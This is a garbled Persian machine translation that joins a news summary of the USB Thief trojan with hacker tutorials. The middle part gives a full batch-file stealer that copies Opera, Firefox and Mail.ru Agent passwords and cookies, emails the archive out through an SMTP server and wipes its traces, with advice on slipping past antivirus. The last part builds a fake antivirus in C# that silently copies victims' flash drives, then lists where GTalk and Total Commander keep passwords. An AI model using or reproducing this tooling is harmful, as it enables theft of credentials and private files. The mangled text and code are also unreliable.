ساده ترین فلش درایو. Trojan Thief USB ردیابی را ترک نمی کند و در درایوهای فلش کار می کند چگونه داده ها را از طریق یک درایو فلش USB و رجیستری سرقت می کند
Troyan بسیار غیر معمول: مالور نام دزد USB را دریافت کرد (Win32 / PSW.Stealer.nai). Malname بر سرقت داده ها متمرکز است، آن را اعمال می کند و بر روی درایوهای فلش معمولی اعمال می شود، و همچنین مهارت های ماهرانه ای از حضور آن در سیستم را پنهان می کند. Troyan ایده آل برای CybershPionage است، زیرا می تواند حتی از سیستم های شبکه جدا شود، اگر بتوانید یک درایو USB را به آنها متصل کنید.
بر خلاف سایر تهدیدات USB که در میانبرهای برنامه های کاربردی Autoload و Fake نوشته شده اند، به طوری که مالور آغاز می شود، دزد USB در غیر این صورت عمل می کند. کار تروجان برای این واقعیت طراحی شده است که کاربران اغلب در نسخه های فلش درایو های قابل حمل از برنامه های کاربردی مانند فایرفاکس، دفترچه یادداشت ++، TrueCrypt و غیره ذخیره می شوند. Malwar به طور منظم در زنجیره ای از دانلود چنین برنامه هایی، صدور خود را برای یک فایل پلاگین یا DLL تعبیه شده است. بنابراین، هنگامی که کاربر برنامه آشنا را از درایو فلش شروع می کند، همراه با آن (در پس زمینه)، Troyan راه اندازی می شود.
نویسنده ناشناخته Malviva از حفاظت جدی برای توسعه او مورد سوء استفاده قرار گرفته است. با استفاده از شناسه منحصر به فرد و پارامترهای درایو، دزد USB به هر درایو فلش آلوده گره خورده است. بخشی از فایل های تروجان توسط رمزگذاری AES128 محافظت می شود، با کلید به طور دقیق بر اساس پارامترهای منحصر به فرد دستگاه تولید می شود. همچنین، نام فایل های Malvari در هر مورد swarming هستند: آنها بر اساس محتویات فلش پلیر و زمان ایجاد فایل ها تولید می شوند. هنگام تلاش برای کپی کردن دزد USB به یک درایو فلش دیگر یا هارد دیسک معمولی، این سیستم حفاظت دو مرحله ای به Malvari نمی دهد تا درآمد کسب کند و همچنین به طور جدی رفتار مهندسی معکوس را پیچیده می کند.
ساختار تروجان.
دزد USB به طور مستقیم از درایو فلش کار می کند و در سیستم خود هیچ ردیابی نمی کند. Troyan شامل شش فایل است، چهار نفر از آنها اجرایی هستند و دو اطلاعات پیکربندی دیگر شامل می شوند. اولین لودر مسئول راه اندازی تروجان همراه با نسخه قابل حمل هر برنامه است. این دستگاه USB را بررسی می کند و اطمینان می دهد که می تواند اطلاعات به سرقت رفته را در آن ضبط کند و آن را در اینجا ذخیره کند. سپس بار دوم شروع می شود. او اسامی فرآیندهای والدین را بررسی می کند و اطمینان حاصل می کند که آن را در یک محیط مشترک کار می کند (و هیچ کس سعی در تجزیه و تحلیل آن ندارد). لودر سوم، به نوبه خود، حضور در سیستم آنتی ویروس را بررسی می کند.
آخرین، چهارم Pailad، که در فرایند در حال اجرا تعبیه شده است، به طور مستقیم مسئول سرقت داده ها است. دزد USB اسناد، تصاویر، لیست فایل ها را از همه دیسک های موجود، داده های رجیستری ویندوز و اطلاعات جمع آوری شده با استفاده از Winaudit را ربوده است. تمام داده های سرقت شده در درایو فلش ذخیره می شوند و با استفاده از رمزنگاری بیضوی رمزگذاری می شوند.
کارشناسان ESET توجه داشته باشید که حملات با استفاده از دزد USB نمی تواند عمل مشترک باشد. با این وجود، Troyan بسیار خطرناک است، زیرا تشخیص حضور آن دشوار است و پس از استخراج درایو USB، هیچ اثری از انتخابات اطلاعات باقی می ماند. همچنین در گزارش این شرکت بیان می کند که نویسنده Malvari، اگر مورد نظر، می تواند "دوباره دوباره" را دوباره پر شود، جایگزین Dyiload برای سرقت داده ها در هر مالر دیگر.
در این مقاله من به سرعت و بدون مشکل بسیار توضیح خواهم داد، نوشتن و ایجاد فایل های فوکوس ویروس با کلمه عبور و ارسال آن همه در صندوق پستی.
بیایید با این واقعیت شروع کنیم که ویروس در BAT "E (CMD، دستورات اصلی که می توانید انجام دهید) نوشته شده است، که در فایل متنی معمول است و با استفاده از یک پروانه استاندارد، ساخته شده در پنجره های استاندارد، اجرا می شود خط فرمان ".
به منظور نوشتن یک ویروس مشابه، شما باید محل ذخیره سازی دقیق آن فایل ها را بدانید و سرقت کنید، اجزای BLAT که می توانید از سایت خارج از سایت http://www.blat.net/ یا از سرور ما دانلود کنید و همچنین یک جزء از WinRar Archiver Rar.exe (شما می توانید بدون آن انجام دهید).
دفترچه یادداشت را باز کنید و کد زیر را کپی کنید:Echo Off MD٪ SystemRoot٪ SystemRoot٪ SystemDrive٪ SystemDrive٪ SystemDrive٪ \\ Pass \\ Opera \\ MD٪ SystemDrive٪ \\ Pass \\ Mozilla \\ MD٪ SystemDrive٪ \\ Pass \\ MailAgent \\ MD٪ SystemDrive٪ \\ Pass \\ MailAgent \\ reg attam٪ SystemRoot٪ \\ Wincs + H + S + R Attrib٪ SystemDrive٪ \\ Pass + H + S + R Copy / Y "٪ SystemRoot٪ \\ Blat.exe"٪ SystemRoot٪ \\ Wincs \\ blat.exe "کپی / y٪ systemRoot٪ \\ blat.dll "٪ systemRoot٪ \\ wincs \\ blat.dll" کپی / y٪ systemroot٪ \\ blat.lib "٪ systemroot٪ \\ wincs \\ blat.lib" cd / d٪ appdata٪ \\ opera \\ opera \\ copy / y wand.dat٪ systemDrive٪ \\ pass \\ opera \\ wand.dat copy / y cookies4.dat٪ systemDrive٪ \\ pass \\ opera \\ cookies4.da regedit.exe -a٪ systemDrive٪ \\ pass \\ mailagent \\ reg agent.reg "hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins2 regedit.exe -ea٪ systemDrive٪ \\ pass \\ mailagent \\ reg \\ agent_3.reg" hkey_current_user \\ software \\ mail.ru \\ agent \\ magent_logins3 cd / d٪ appdata٪ xcopy mra \\ base٪ systemDrive٪ \\ pass \\ mailagent / k / h / g / q / r / s / y / e\u003e nul xcopy mra \\ update \\ ver.txt٪ systemDrive٪ \\ pass \\ mailagent / K / H / G / Q / R / S / Y\u003e Nul CD٪ APPDATA٪ \\ Mozill a \\ فایرفاکس / پروفایل ها \\ *. پیش فرض \\ کپی / y cookies.sqlite٪ systemDrive٪ \\ pass \\ mozilla / cookies.sqlite copy / y key3.db٪ systemDrive٪ \\ pass \\ mozilla \\ key3.db کپی / y signons.sqlite ٪ systemDrive٪ \\ pass \\ mozilla \\ signons.sqlite کپی / y٪ windir٪ \\ rar.exe٪ systemDrive٪ \\ pass \\ rar.exe\u003e \u200b\u200bnul del / s / q٪ systemroot٪ \\ rar.exe٪ systemDrive٪ \\ pass \\ rar.exe a -r٪ systemDrive٪ \\ pass \\ pass.rar٪ systemDrive٪ \\ pass \\ copy / y٪ systemDrive٪ \\ pass \\ pass.rar٪ systemRoot٪ \\ wincs \\ pass.rar cd٪ systemRoot٪ \\ Wincs ٪ SystemRoot٪ \\ Wincs \\ blat.exe -Install -Server SMTP.Yandex.RU -Port 587 -f [email protected] -u ورود به سیستم Pass.rar٪ SystemRoot٪ \\ Wincs \\ blot.exe بدن fileespassword -to [email protected] -attach٪ systemRoot٪ \\ wincs \\ pass.rar rmdir / s / q٪ systemDrive٪ \\ pass rmdir / s / q٪ systemroot٪ \\ wccs del / s / q٪ systemroot٪ \\ blot. exe del / s / q٪ systemroot٪ \\ blot.dll del / s / q٪ systemroot٪ \\ blat.lib attrib + a + s + h + r٪ systemroot٪ \\ wind.exe خروج CLS
نه خیلی برای نوشتن کد Batinka خود.
Echo Off - بدن Batinka را پنهان می کند (بنابراین لازم نیست، اما هنوز)
mD٪ SystemRoot٪ \\ Wincs - یک پوشه WINCS را در پوشه سیستم ویندوز ایجاد می کند، صرف نظر از اینکه دیسک آن نصب شده یا به عنوان آن نامگذاری شده است.
mD٪ SystemDrive٪ \\ Pass \\ - ایجاد پوشه Pass روی دیسک که در آن ویندوز نصب شده است.
mD٪ SystemDrive٪ \\ Pass \\ Opera \\ - یک پوشه اپرا را ایجاد می کند که در آینده با مرورگر اپرا کپی می شود (تا 11 * نسخه های اپرا رمزهای عبور خود را در فایل wand.dat ذخیره کنید)
- یک پوشه موزیلا ایجاد می کند که در آن فایل های مرورگر Mozilla همچنان کپی می شوند (کوکی ها .sqlite، key3.db، signons.sqlite) که در آن کلمه عبور ذخیره می شود، کپی می شود.
mD٪ SystemDrive٪ \\ Pass \\ Mailagent \\ - یک پوشه MailAgent را ایجاد می کند که فایل های مربوط به تاریخ مکاتبات و کلیدهای رجیستری (کلید های رمز عبور) از نماینده ایمیل کپی می شود.
mD٪ SystemDrive٪ \\ Pass \\ Mailagent \\ REG - یک پوشه REG ایجاد می کند
attrib٪ SystemRoot٪ \\ Wincs + H + S + R - ویژگی ها را به پوشه Wincs قرار می دهد، به این ترتیب آن را از چشم پنهان می کند.
attrib٪ SystemDrive٪ \\ Pass + H + S + R - همانند بالا.
کپی / y "٪ systemroot٪ \\ blat.exe"٪ systemRoot٪ \\ wincs \\ blat.exe " - فایل blat.exe را از تخلیه به پوشه Wincs کپی می کند
کپی / y "٪ systemroot٪ \\ blat.dll"٪ systemRoot٪ \\ Wincs \\ blat.dll " - فایل blat.dll را از تخلیه به پوشه Wincs کپی می کند
کپی / y "٪ systemroot٪ \\ blat.Lib"٪ systemroot٪ \\ wccs \\ blat.lib " - فایل blat.lib را از محل پلاگین در پوشه Wincs کپی می کند
CD / D٪ Appdata٪ \\ opera \\ opera \\ - وارد پوشه اپرا که در آن فایل ها با رمزهای عبور (و نه تنها) از اپرا واقع شده اند.
کپی / y wand.dat٪ systemDrive٪ \\ pass \\ opera \\ wand.dat - فایل wand.dat را به پوشه اپرا کپی می کند
copy / y cookies4.dat٪ systemDrive٪ \\ pass \\ opera \\ cookies4.dat - فایل cookies4.dat را به پوشه اپرا کپی می کند
regedit.exe -ea٪ SystemDrive٪ \\ Pass \\ MailAgent \\ REG \\ Agent.reg "HKEY_Current_USER \\ Software \\ Mail.ru \\ Agent \\ Magent_Logins2 - کلید رجیستری Magent_Logins2 را که رمز عبور در پوشه Reg ذخیره می شود، صادرات می کند
regedit.exe -ea٪ SystemDrive٪ \\ Pass \\ MailAgent \\ REG \\ Agent.reg "HKEY_Current_USER \\ Software \\ Mail.ru \\ Agent \\ Magent_Logins3 - کلید رجیستری Magent_Logins3 را که رمز عبور در پوشه Reg ذخیره می شود، صادرات می کند
cd / d٪ appdata٪ - برو به پوشه Appdata
xcopy mra \\ base٪ systemDrive٪ \\ pass \\ mailagent / k / h / g / q / r / s / y / e\u003e nul - محتویات پوشه MRA \\ Base را در پوشه MailAgent کپی می کند
XCopy MRA \\ Update \\ ver.txt٪ SystemDrive٪ \\ Pass \\ MailAgent / K / H / G / Q / R / S / Y\u003e NUL - فایل ver.txt را به پوشه MailAgent کپی می کند
cd٪ appdata٪ \\ mozilla \\ فایرفاکس / پروفایل ها \\ * پیش فرض \\ - برو به پوشه با مشخصات مرورگر Mozilles
copy / y cookies.sqlite٪ systemDrive٪ \\ pass \\ mozilla \\ cookies.sqlite - فایل cookies.sqlite را به پوشه موزیلا کپی می کند
کپی / y key3.db٪ systemDrive٪ \\ pass \\ mozilla \\ key3.db - فایل key3.db را به پوشه موزیلا کپی می کند
کپی / y signons.sqlite٪ systemDrive٪ \\ pass \\ mozilla \\ signons.sqlite - فایل signons.sqlite را به پوشه موزیلا کپی می کند
کپی / y٪ windir٪ \\ rar.exe٪ systemDrive٪ \\ pass \\ rar.exe\u003e \u200b\u200bnul- کامپوننت آرشیوی WinRAR RAR.EXE را به پوشه PASS کپی می کند
del / s / q٪ systemroot٪ \\ rar.exe - کامپوننت آرشیو را از پوشه ویندوز حذف می کند
٪ SystemDrive٪ \\ Pass \\ rar.exe A -R٪ SystemDrive٪ \\ Pass \\ Pass.rar٪ SystemDrive٪ \\ Pass \\- بایگانی محتویات پوشه Pass
کپی / y٪ systemDrive٪ \\ pass \\ pass.rar٪ systemroot٪ \\ wincs \\ pass.rar کپی آرشیو ایجاد شده به پوشه Wincs
cD٪ SystemRoot٪ \\ Wincs - برو به پوشه Wincs
٪ SystemRoot٪ \\ Wincs \\ blat.exe -Install -Server SMTP.Yandex.RU -Port 587 -F [email protected] -u ورود به سیستم -PW رمز عبور - آماده سازی برنامه BLAT برای ارسال آرشیو نشان دادن داده ها برای مجوز و ارسال نامه ها. فراموش نکنید که داده های خود را از صندوق پستی مشخص کنید، از جایی که نامه با آرشیو ارسال می شود.
رن * .ra pass.rar - فقط در صورتی که بایگانی نام اشتباه را در طول دوره قبول نکرد، ما آن را به pass.rar تغییر دادیم
٪ systemRoot٪ \\ wincs \\ blat.exe -body files password-to [email protected]. -Attach٪ SystemRoot٪ \\ Wincs \\ Pass.rar - مشخص کنید که کدام آدرس پستی توسط نامه ارسال می شود و آن را ارسال می کند.
rmdir / s / q٪ systemDrive٪ \\ Pass - پوشه Pass را حذف کنید
rmdir / s / q٪ systemroot٪ \\ wincs - حذف پوشه Wincs
del / s / q٪ systemroot٪ \\ blat.exe
del / s / q٪ systemroot٪ \\ blat.dll - ما اجزای BLAT را از پوشه ویندوز حذف می کنیم.
del / s / q٪ systemroot٪ \\ blat.lib - ما اجزای BLAT را از پوشه ویندوز حذف می کنیم.
attrib + A + S + H + R٪ SystemRoot٪ \\ wind.exe - ما ویژگی های خود را به همان شیوه پنهان کردن خود را از چشم.
خروج - تکمیل فرآیند Batinka و خروج.
cLS - خروجی هر ردیف را در Imoder تمیز کنید.
کپی شده، ذخیره به عنوان wind.bat و کامپایل در exe با استفاده از BAT به برنامه مبدل EXE، پس ما همه چیز را به یک دسته جمع آوری، یعنی، ما اجزای برنامه BLAT و مولفه WinRAR آرشیو (شما می توانید دانلود کنید) و چسب یک فایل اجرایی یا با چه برنامه ای، مسیر تخلیه تمام فالمان ها باید٪ SystemRoot٪ یا٪ WindressDir٪ یا٪ Windir٪ باشد.
به عنوان یک نتیجه، ما یک ویروس دریافت می کنیم که توسط آنتی ویروس عبور نمی کند و بایگانی را با فایل های شما در ایمیل ارسال می کند. فایل هایی که به ایمیل می آیند می توانند با استفاده از بازیابی چندگانه رمزگشایی رمزگشایی شوند، اما تنها نیست wand.dat از اپرا و سپس اگر آن را به 11 * نسخه به روز نشده است. تمام فایل های دیگر را می توان با جایگزینی خود رمزگذاری کرد.
در این مورد من فکر می کنم شما می توانید به پایان برسد، اگر سوالی دارید، دریغ نکنید که بپرسید.
با تشکر از توجه شما، همه چیز خوب است!
© مبادله theheckworld.in.
برای درایوهای فلش فولادی ساده - این دستگاه برای انتقال اسناد / فیلم ها / تصاویر و سایر اطلاعات شخصی (و گاهی بسیار شخصی) است. اما برای هکرها، درایو فلش در همان زمان قربانی و یک ابزار رزمی است. امروز من به شما می گویم همه ظرافت های تخلیه نامرئی داده ها از درایوهای فلش به کامپیوتر من، و همچنین آموزش به نوبه خود درایو های فلاش بی خطر به پشتیبان گیری از کلمات عبور از کامپیوتر "بزرگ".
درایوهای فلش کامل
ایده برنامه "Evil Comp" به شرح زیر خواهد بود. ما یک ابزار کوچک را توسعه خواهیم داد که وانمود می کند که آنتی ویروس فوق العاده مگا پیشرفته، هدف آن حذف کیفی از ویروس های "خطرناک" از درایوهای فلش است. هیچ کس هیچ کس دیگری را که آلوده به ویروس های فلش نیست، تعجبی نخواهد کرد، بنابراین "آنتی ویروس" تخصصی ما باعث ترس های کاربر ناخوشایند نخواهد شد. برعکس، قرار دادن یک درایو فلش به شما در کامپیوتر و دیدن نوع پیام: "یک ویروس کشف شده است. من اسکن دقیق از تمام فایل ها برای حضور آلوده »- او قطعا منتظر اتمام این عملیات خواهد بود.
آماده سازی ابزار
چنین برنامه ای مفید را بنویسید، ما در حال حاضر در حال حاضر در حال حاضر C # خواهد بود. انعطاف پذیری زبان و قابلیت های پلت فرم گسترده. این اجازه می دهد تا شما را به توسعه برنامه های با سرعت رعد و برق. این چیزی است که ما نیاز داریم ما علاقه مند به محصول هستیم که می توانیم جمع آوری کنیم، و نه فرآیند تدوین برنامه نویسی.
یکی از اجزای مهم برنامه ما یک رابط خواهد بود. جامد تر شما این کار را انجام می دهید، شانس بیشتری که قربانی ترفند را متوجه نخواهد شد و آرام انتظار می رود تکمیل اسکن ضد ویروس. من به خصوص بخار داده نشدم و یک تصویر و پیشرفت را در قالب یک پروژه تمیز ارسال کردم. شما می توانید از کامل دور شوید و یک طراحی نفس گیر ایجاد کنید. من به شما توصیه می کنم اعدام برخی از آنتی ویروس واقعی را ببینید و تقریبا به همان سبک برای صدور درخواست شما.
ما این کار را گذاشتیم
ما فرض می کنیم که ما با مسائل سازمانی تصمیم گرفتیم و الگوریتم اقدامات تصمیم گیری کنیم، وقت آن رسیده است تا تفاوت های فنی فنی را مورد بحث قرار دهیم. بنابراین، ضد ویروس ما باید کار کثیف خود را در هنگام نصب درایو فلش شروع کند. به محض اینکه دیسک جدید در سیستم ظاهر می شود، برنامه ما باید نامه خود را تعیین کند و شروع به کپی کند.
قبل از اینکه من این مقاله را بنویسم، کد منبع یک برنامه مشابه چشم من گرفت. نویسنده این مثال، واقعیت حضور یک درایو فلش را با خاموش شدن دوره ای از تمام دیسک ها برای حضور یک درایو "متوسط \u200b\u200bقابل جابجایی" تعیین کرد. در ابتدا فکر کردم به همان شیوه رفتم، اما صدای داخلی در غیر منطقی مطرح شد. داشتن همه "برای" و همه "خوب، آن را روشن است"، من این ایده را انداختم و به MSND رفتم. پنج دقیقه بعد معلوم شد که من آن را بیهوده انجام دادم. پاسخ یافت شد!
بدون winapi هیچ جا ...
شما می توانید به طور موثر در اتصال تجهیزات جدید (در مورد ما - درایو فلش) با گرفتن و تجزیه و تحلیل پیام WM_Devicechange یاد بگیرید. در طول نصب دستگاه، پیام به تمام پنجره ها ارسال می شود و ما به راحتی می توانیم آن را در برنامه خود پردازش کنیم. برای این، فقط به اندازه کافی برای توصیف عملکرد WindowProc است. در عمل، به نظر می رسد این است:
Lresult Callback WindowProc (Hwnd Hwnd، // Uint UMSG پنجره شناسه، // WPARAM WPARAM شناسه پیام، // رویداد که LPARAM LPARAM // اشاره گر به ساختار حاوی داده ها)
در بدن از عملکرد شما نیاز به مقایسه ارزش پارامتر WParam با شناسه های رویدادهای مختلف مربوط به WM_DEVICECHANGE. برای مثال، این خواهد بود:
خوب، چگونگی ایجاد واقعیت اتصال تجهیزات جدید، ما می دانیم، اما چگونه مطمئن شوید که شما فلش درایو را وصل کرده اید؟ دستگاه ها با امکان "اتصال داغ" (من در مورد USB) یک مجموعه بزرگ (چاپگر، اسکنر، مودم، و غیره). خوشبختانه، و این مشکل کاملا ساده است. توسط پارامتر LParam، ما می توانیم به ساختار _dev_broadcast_hdr اشاره کنیم که دارای یک میدان dbch_devicetype است. این، بر اساس ارزش، این زمینه ها هستند و نتیجه گیری های مناسب انجام می شود. اگر آن برابر dev_devtyp_volume برابر است، سپس زمان برای پیوستن و ضرب و شتم دست های خود را - فلش درایو به ما متصل است!
typedef crunct _dev_broadcast_hdr (dbch_size؛ // dword dbch_devicetype اندازه ساختار؛ // dword dbch_rerved؛ / / رزرو شده، رزرو شده، مورد استفاده قرار نمی گیرد) dev_broadcast_hdr، * pdev_broadcast_hdr؛
در بیدمشک ما یک درایو فلش را وارد کردیم، "ما سعی خواهیم کرد نامه ای از دیسک را تشخیص دهیم که سیستم رفته است. همانطور که در "زمینه معجزات"، شما می توانید آن را حدس بزنید، اما بهتر است اطلاعات را از ساختار dev_broadcast_volume بیرون بکشید.
Cruct Typedef _dev_broadcast_volume (dword dbcv_size؛ // dwword dbcv_devicetype اندازه؛ // dwword dbcv_reserved نوع دستگاه؛ // dword dbcv_unitmask ذخیره شده؛ // bit ماسک درایو درایو کلمه dbcv_flags؛ //) dev_broadcast_volume، * pdev_broadcast_volume؛
از تمام زمینه های این ساختار، ما علاقه مند به dbcv_unitmask هستیم. به یاد داشته باشید که این ویژگی شامل حروف بیت و نه عملکرد نمادین آن نیست. به عنوان مثال، اگر مقدار 0 باشد، نامه درایو یک؛ اگر 1، سپس ب و غیره برای راحتی گرفتن یک حرف شخصیت، بهتر است یک تابع بنویسید.
اگر شما به مدت طولانی خواندن خود را مطالعه کرده اید و با توابع API آشنا هستید، پس در خواندن بخش بعدی مقاله، نیازی نیست. ویرایشگر را باز کنید و برنامه را شروع کنید. من تمام ساختارها و توابع لازم را شرح دادم؛ شما می توانید آنها را در برنامه جمع آوری کنید. تعریف کنید، و من غوطه وری از v.net و C # را به طور خاص شروع خواهم کرد.
stay.net "OM.
زمان تمرین و اعمال دانش به زبان C #. "چی؟ - شما از شما میپرسید "Stalls در مورد WinAPI گفت، و پس از آن من فقط احمقانه تصمیم گرفتیم تماس برای تمام توابع در قالب یک کد بومی برقرار شود؟ سرعت توسعه رعد و برق اعلام شده کجاست؟ "
در چیزی که درست است. برنامه ما واقعا از توابع WinAPI استفاده می کند (ساده تر است)، اما ما آنها را توصیف نخواهیم کرد. بسیاری از توسعه دهندگان با مشکل تعریف درایوهای فلش مواجه شدند. به عنوان یک نتیجه از این اسکیت ها، کلاس های رایگان برای C # شروع به ظاهر شدن، که در آن تمام قابلیت های لازم در حال حاضر اجرا شده است. ما فقط باید چنین قطعه کار را متصل کنیم (بخشی را بخوانید) به پروژه خود و ایجاد یک جفت روش. ما از یکی از این کلاس ها استفاده خواهیم کرد. اما دانش ساختارهای فوق در بالا، شما برای انتقال این برنامه به ویندوز API برای شما مفید خواهد بود.
کلاس های آماده ساخته شده چنین وظایفی را تعیین می کنند، مجموعه ای عالی، اما من از Jan Dolinay گزینه را دوست داشتم. این شخص بسیار آسان برای استفاده و درک کد کلاس drivivetector، که می تواند:
و مهمتر از همه، با این کلاس، کار بسیار آسان است - در این شما اکنون مطمئن شوید. اتصال یک کلاس به پروژه آن به صورت استاندارد انجام می شود و به این معنا متوقف نمی شود. بنابراین، بیایید بلافاصله به راه اندازی مجدد حرکت کنیم. این کار مانند این است:
FlashDriveTeTector \u003d new drivivetector ()؛ FlashDriveTetector.DevicearriVed + \u003d New DrividetectormentHandler (OnDrivearriVed)؛ FlashDriveTeTector.DevicerEmoved + \u003d New DrividetectormentHandler (OnDrivemonded)؛
پس از ایجاد یک نمونه از شیء کلاس DriviVetector، من Deviearrived () و DriveDoved () Handlers رویداد را تعریف می کنم. با توجه به نام آنها، حدس می زنم که آنها جواب می دهند. تمام کد اولیه سازی بهتر است به روش فرم 1 () نوشته شود. کد اصلی برنامه ما در Handler رویداد DeviAreved خواهد بود. شما متن خود را در ضربه زدن خواهید دید:
رشته dirname \u003d محیط زیست.getCommandLineargs () + "Flash_" + dateTime.Now.ToString ("DD-MM-YY-HH-MM-SS")؛ CittleIRectory (Dirname)؛ XDirectory FlashCopier \u003d جدید XDirectory ()؛ flashcopier.indexcomplete + \u003d indexcompleteeventhandler (indexcompleate)؛ flashcopier.itemcopied + \u003d جدید itemcopiedeventhandler (itemcopied)؛ flashcopier.copyComplete + \u003d CopyCompleteeventhandler (CopyComplete)؛ FlashCopier.Source \u003d New DirectoryInfo (E.Drive.ToString ())؛ FlashCopier.Destination \u003d New DirectoryInfo (DIRNAME)؛ flashcopier.Overwrite \u003d true؛ flashcopier.folderfilter \u003d "*"؛ flashcopier.filefilters.add ("*. doc")؛ flashcopier.filefilters.add ("*. xls")؛ // تعریف فیلتر های دیگر // .... flashcopier.startcopy ()؛
در ابتدای لیست، من مسیر را به پوشه ای که در آن محتویات فلش درایو را کپی می کنیم تعریف می کنم. کپی در دایرکتوری "Flash_Text Date" قرار دارد که در پوشه ای است که از آن برنامه کاربردی ما در حال اجرا است بسیار راحت تر است. تصمیم گیری با نام پوشه، من سعی می کنم آن را با استفاده از تابع cittleiRectory () ایجاد کنم. من این ویژگی را به طور انحصاری برای راحتی نوشتم. این در آن یک نمونه از Object DirectoryInfo رخ می دهد، طراحی شده برای کار با دایرکتوری ها، و با روش ایجاد آن ()، که یک پوشه جدید را ایجاد می کند، تماس بگیرید.
پس از ایجاد یک پوشه، می توانید کپی کنید. من تمام فایل ها را با استفاده از یک شیء نوع XDirectory کپی خواهم کرد. اگر کد را از لیست خود تایپ کنید، هنگامی که سعی می کنید کامپایلر را کامپایل کنید، کامپایلر خطایی را ایجاد می کند که در آن سیاه و سفید در سفید گفته می شود: "هدف این نوع یافت نشد."
واقعیت این است که XDirectory یک کلاس شخص ثالث است. یک بار دیگر پیش من آن را در اینترنت Ineta یافتم و از آن زمان اغلب من اغلب در پروژه هایم استفاده می کنم. من آن را در این واقعیت دوست دارم که به اندازه کافی برای تماس با یک روش برای کپی کردن پوشه های سرمایه گذاری کافی است. علاوه بر این، به شما اجازه می دهد فیلترها را نصب کنید.
واقعا بدون آن کار کنید ما کلاس های استاندارد را می گیریم، به خوبی شناخته شده به همه برنامه نویسان پذیرش - بازگشتی - و نوشتن یک زن و شوهر از ده خط کد. افسوس، من نمی خواهم این کار را به طور قطعی انجام دهم. در حیاط قرن XXI، شما باید اقدامات و XDirectory خود را بهینه سازی کنید تا به ما کمک کنید.
ماژول با کلاس با دیسک ما دروغ است، و شما می توانید در مورد روش / خواص / حوادث با نگاه کردن به جدول مناسب یاد بگیرید.
خواص کلاس XDirectory
روش های کلاس XDirectory
سعی کنید برنامه ما را اجرا کنید و یک درایو USB فلش را وارد کنید. پس از چند ثانیه (بسته به گنبد درایو فلش خود)، کل محتویات درایو USB به پوشه ای که از آن یک برنامه تازه پخته شده را راه اندازی کرده اید نقل مکان کرد.
USB Grabber.
در حال حاضر وظیفه مخالف را در نظر بگیرید و در مورد ظرافت های خلقت به اصطلاح صحبت کنید. Flashki Grabber. اصل ایجاد دقیقا همان. شما باید یک برنامه ساده را بنویسید که به طور خودکار پس از نصب درایو فلش شروع می شود.
در طول عملیات، برنامه توسط کلمات کلیدی رجیستری / کلمات کلیدی که در آن برنامه های محبوب ذخیره رمز عبور ذخیره شده و می تواند به یکی از پوشه های خود را که ممکن است کپی شده است، شریر خواهد شد. به منظور مدیر خودرو شما موجب سوء ظن کاربر ضعیف می شود، نگران نباشید آن را به طور کامل پنهان کنید. به عنوان مثال، تحت منوی راه اندازی.
شما احتمالا می دانید که نسخه به اصطلاح قابل حمل برنامه های کاربردی اکنون بسیار محبوب شده است، یعنی برنامه ها می توانند به طور مستقیم از درایو فلش کار کنند. این بهترین بازی است. تشکیل یک برنامه در سبک مناسب و برای حقیقت، چند دکمه طراحی شده برای اجرای هر برنامه را از بین ببرید. گزینه طراحی من در تصویر نشان داده شده است.
چگونه ما غارت می کنیم؟
من بلافاصله می گویم که اقدامات فوق العاده هکر نیازی به انجام این کار نیست. اکثر برنامه ها اطلاعات شخصی را در اسناد و تنظیمات \\ user \\ programname٪ یا در رجیستری ذخیره می کنند. تحت برنامه RoundName به معنای هر برنامه است. اگر شما در انتخاب اول آمده اید، باید از کلاس XDirectory در حال حاضر شناخته شده (یا روش های استاندارد کار با فایل ها) استفاده کنید و همه چیز را که با آن نیاز دارید کپی کنید. در مورد دوم، شما باید با رجیستری کار کنید. یک نمونه از فایل های کپی، مقابله نخواهد کرد (ما قبلا در نظر گرفته شده)، اما نحوه ارتباط با ابزار رجیستری .NET - من در حال حاضر نشان خواهم داد (در مثال تعیین مسیر به پوشه TC):
RegistryKey Readkey \u003d Registry.Currentuser.OpenSubkey ("نرم افزار \\\\ Ghisler \\" کل فرمانده کل)؛ رشته کلید \u003d (رشته) Readkey.GetValue ("InstallDir")؛
این همه است کد دیگر نخواهد بود این دانش باید برای شما کافی باشد تا فایل ها را با اطلاعات ارزشمند بکشید. برای ایجاد یک کار کم اهمیت، لیستی از برنامه های محبوب ترین را تهیه کردم و تمام مسیرهایی را که آنها داده های ذخیره شده ذخیره شده را ذخیره می کنند، نقاشی کرده ام.
mail.agent
Mail.ru Messenger در حال حاضر بسیار محبوب در میان کاربران عادی مرگبار (به ویژه در زن) بسیار محبوب است. اهداف روشن است، وظایف تحویل داده می شود، بنابراین ما علاقه مند هستیم:
gtalk
شرکت گوگل محصولات مناسب و کاربردی را ایجاد می کند که از جمله مشتری Gabber وجود دارد - gtalk. امروز gtalk خیلی محبوب نیست در هر کامپیوتر دوم، آن نصب نشده است، اما گاهی اوقات هنوز هم یافت می شود و در موضوع، بهتر است بلافاصله برنامه خود را برای دریافت کلمه عبور و از این مسیحیت آموزش دهید. رمزهای عبور از همه حساب های GTalk فروشگاه در رجیستری - hhey_current_user \\ software \\ Google \\ Google Talk \\ حساب. در این موضوع، تمام حساب ها ذکر شده اند که در آن ورودی تا به حال ساخته شده است gtalk. کلمه عبور به حساب در پارامتر رشته PW ثبت می شود.
کل فرمانده
کل فرمانده - مطمئنا، محبوب ترین مدیر فایل. توابع در برنامه شامل یک ماشین تقریبی و یک سبد کوچک (و تعداد زیادی از آنها می توانند با پلاگین های اضافی نصب شوند). ما فقط در مشتری داخلی FTP علاقه مند هستیم. البته از بسیاری از کلمات عبور استفاده می کند، البته، حفظ می شود.
TC بر خلاف بسیاری از برنامه های دیگر، کلمه عبور را در رجیستری ذخیره نمی کند و فایل های قدیمی INI خوب استفاده می شود. کلمه عبور، و همچنین تمام اطلاعات لازم برای اتصال به سرورها (IP، پورت، نام کاربری و غیره) کل فرمانده فروشگاه ها در فایل wcx_ftp.iniکه بی گناه در پوشه برنامه قرار دارد. مسیر به دایرکتوری که در آن نصب شده است کل فرماندهشما می توانید از رجیستری یاد بگیرید. PLOY در HKEY_CURRENT_USER \\ Software \\ Ghisler \\ کل فرمانده کل فرمانده.
فایرفاکس
